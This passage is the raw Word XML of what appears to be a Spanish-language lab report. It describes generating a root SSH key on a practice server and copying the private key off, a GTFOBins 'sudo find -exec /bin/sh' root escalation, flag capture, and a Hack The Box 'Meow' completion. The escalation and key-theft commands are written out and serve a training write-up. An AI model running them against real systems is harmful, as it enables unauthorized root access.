        </w:rPr>
        <w:t xml:space="preserve">""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En la máquina objetivo, como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, se generó un par de llaves RSA tradicional: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rsa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/.ssh/id_rsa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_08e15e70021053376a8959631d491b6e081acc1"/>
      <w:r>
        <w:t xml:space="preserve">4.2 Despliegue de Llaves y Manejo de Errores de Permisos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se intentó desplegar la llave pública mediante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh-copy-id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh-copy-id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/.ssh/llave_p.pub developer@192.168.1.101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El intento fue rechazado debido a que la autenticación mediante contraseña se encontraba deshabilitada en la configuración del demonio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sshd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PasswordAuthentication no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se extrajo la llave privada</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">generada en el servidor hacia la máquina atacante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Al intentar conectar con permisos estándar de archivo (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0664</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), el cliente OpenSSH abortó la conexión por motivos de seguridad:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Permissions 0664 for 'id_rsa' are too open.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">It is required that your private key files are NOT accessible by others.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">This private key will be ignored.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Load key "id_rsa": bad permissions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Corrección de Permisos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 600 id_rsa</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> id_rsa root@192.168.1.101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tras ajustar los permisos a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0600</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(lectura/escritura exclusiva para el propietario), el acceso SSH como superusuario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se consolidó exitosamente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3333750"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidencia 03: Permisos SSH 0664 y Conexión con chmod 600" title="" id="30" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="docs/assets/practica3_ssh_keys/01_ssh_permissions.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Evidencia 03: Permisos SSH 0664 y Conexión con chmod 600</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_2a8f1db21c675307f2401ffcb679950ded0f2be"/>
      <w:r>
        <w:t xml:space="preserve">5. Práctica 4: Post-Explotación Avanzada con GTFOBins y Reto CTF Meow (Hack The Box)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_56825576881b6f57403d3e307a410f7d186d6fc"/>
      <w:r>
        <w:t xml:space="preserve">5.1 Explotación de Binario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(GTFOBins)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El proyecto GTFOBins documenta cómo binarios estándar de Unix pueden ser utilizados para eludir restricciones de seguridad locales cuando están configurados con permisos SUID o privilegios</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo NOPASSWD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El binario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dispone del parámetro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-exec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, el cual ejecuta un comando externo por cada coincidencia encontrada. Al invocarse con privilegios de superusuario:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">developer@cetipracticas:~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo find . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/sh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-quit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># whoami</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El parámetro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">\; -quit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">asegura que la shell se genere inmediatamente en el primer ciclo y termine la búsqueda tras salir de la sesión interactiva.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_8726509d6b0603805df23630cfb2d49eef7e5ab"/>
      <w:r>
        <w:t xml:space="preserve">5.2 Compromiso Total y Extracción de Flag Final</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Habiendo alcanzado la sesión de superusuario, se inspeccionó el directorio raíz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">localizando la bandera final del laboratorio:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root@cetipracticas:~#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cat /root/root.txt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">========================================================================</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">¡FELICIDADES!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> HAS COMPROMETIDO EL SERVIDOR</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">========================================================================</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> FINAL: CETI{R00T_PR1V3SC_GTF0B1NS_M4ST3R_2026}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> completado con éxito la ruta de intrusión completa:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> SAMBA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> FTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> SNMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> NFS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> NoSQLi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ROOT</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">========================================================================</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bandera Final Obtenida:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CETI{R00T_PR1V3SC_GTF0B1NS_M4ST3R_2026}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_56350da7c3896ed8fc71f1f58075250a9c75fd1"/>
      <w:r>
        <w:t xml:space="preserve">5.3 Resolución del Reto CTF en Hack The Box (Máquina Meow)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Como parte de la evaluación práctica de penetración en plataformas industriales de ciberseguridad, se completó la resolución de la máquina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Meow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en la plataforma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hack The Box (HTB)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">por el operador</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lozano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">You have solved Meow!</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Congratulations Lozano best of luck in capturing flags ahead!</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#629953 Machine Rank</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">14 Oct 2026 Pwn Date</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Retired Machine State</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">150 XP Earned</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Level Up! You reached level 2. Keep up the pace!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3333750"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidencia 04: Bandera root.txt de Compromiso Total" title="" id="37" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="docs/assets/practica4_gtfobins_ctf/01_root_flag.png" id="38" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="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Evidencia 04: Bandera root.txt de Compromiso Total</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3333750"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidencia 05: Resolución de Máquina Meow en Hack The Box por Lozano" title="" id="40" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="docs/assets/practica4_gtfobins_ctf/02_htb_meow.png" id="41" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
